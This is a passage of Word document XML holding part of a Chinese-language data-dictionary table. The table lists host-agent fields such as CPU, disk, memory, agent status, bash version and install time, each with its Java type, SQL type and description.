          <w:p w14:paraId="46AA5387" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>kernelVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F53355E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06330A07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F146ED4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内核版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C1D969C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF6EF2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28428051" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A417DB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>core：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4) producer：varchar(512) brand：varchar(512) description：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">1024) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loadAvgFifteen:bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D80AA99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">信息 core：处理器个数 producer：厂商 brand：品牌 description：描述 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loadAvgFifteen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>十五分钟系统平均负载</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F557D85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0627AF26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>diskCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B76FB6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E986E65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18D004D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>硬盘个数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40EBAD6B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DBD4EFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>diskSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328BA9CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32FE2DA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C298BF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>硬盘大小，单位MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="737BE037" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C68B32B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>diskUsage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47AE5588" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0614253E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE55F0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>硬盘使用率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="626D683C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72559929" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>memoryUsage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58E1AB69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6479BC2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D34ECCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内存使用率</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26A6A2B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A44B7FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>memorySize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595337DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6892A951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7683AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内存大小，单位MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="27B4A5C7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BC6380" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1342015D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663B1AC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047F6E3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>通信状态 1 – 在线 0 - 离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A08FEAF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58487CB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FE44B05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="241EEBEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514D3577" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Agent状态，0-在线 1-离线 2-停用 3-删除中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C10646C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661F3AFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lastOnlineTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5726FDAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDF137F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41FB9859" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最后在线时间，时间戳秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AFBA46B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE9781F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>installTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B224E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3DFA53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63B8FE2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装时间，时间戳秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68586693" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32DF6CD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="405E86DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05688635" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15F16264" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agent版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EB3ECCA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="226403D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bashVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71F46BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48D1EA7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="381D7F93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>bash版本，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="583D9CB0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="378FD8AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bashPluginInstalled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24782FC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31CDB159" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1964D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>bash是否安装 true-安装 false-未安装 仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D8DCF15" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB0E1F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>systemLoad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D93B8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12CEC8B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21F6364C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统负载0 – 未知 1 – 低2 – 中 3 – 高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B65C31B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444E51CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>offlineDays</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA48149" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41008B43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CEB5697" w14:textId="46B2B139" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>不</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>在线天数</w:t>
            </w:r>
            <w:r w:rsidR="003513AD" w:rsidRPr="003513AD">
              <w:t>=当前时间-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003513AD" w:rsidRPr="003513AD">
              <w:t>lastOnlineTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BF94DFE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09FAE45D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
